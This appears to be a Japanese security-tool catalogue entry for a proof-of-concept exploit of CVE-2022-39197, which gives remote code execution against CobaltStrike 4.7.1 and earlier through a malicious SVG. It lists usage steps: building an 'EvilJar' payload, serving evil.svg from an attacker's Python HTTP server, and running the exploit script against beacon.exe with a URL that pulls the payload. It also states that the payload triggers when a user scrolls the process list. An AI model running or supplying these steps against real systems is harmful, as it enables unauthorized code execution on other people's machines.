ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!
CVE-2022-39197の概念実証エクスプロイト。HTTP経由で配信される悪意のあるSVGペイロードを介して、CobaltStrike <= 4.7.1に対するリモートコード実行を可能にします。
コミュニティで最も使われているツールを見つけましょう。
すべてのツールを探索
ツールコレクションを閲覧
EvilJar/src/main/java/Exploit.java
Line 19
mvn clean compile assembly:single
EvilJar-1.0-jar-with-dependencies.jar
EvilJar/target/
serve/
serve\evil.svg
[attacker]
python3 -m http.server 8080
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
ユーザーがプロセスリストをスクロールするとすぐに、ペイロードがトリガーされます
https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — この脆弱性の詳細な分析が掲載されています https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html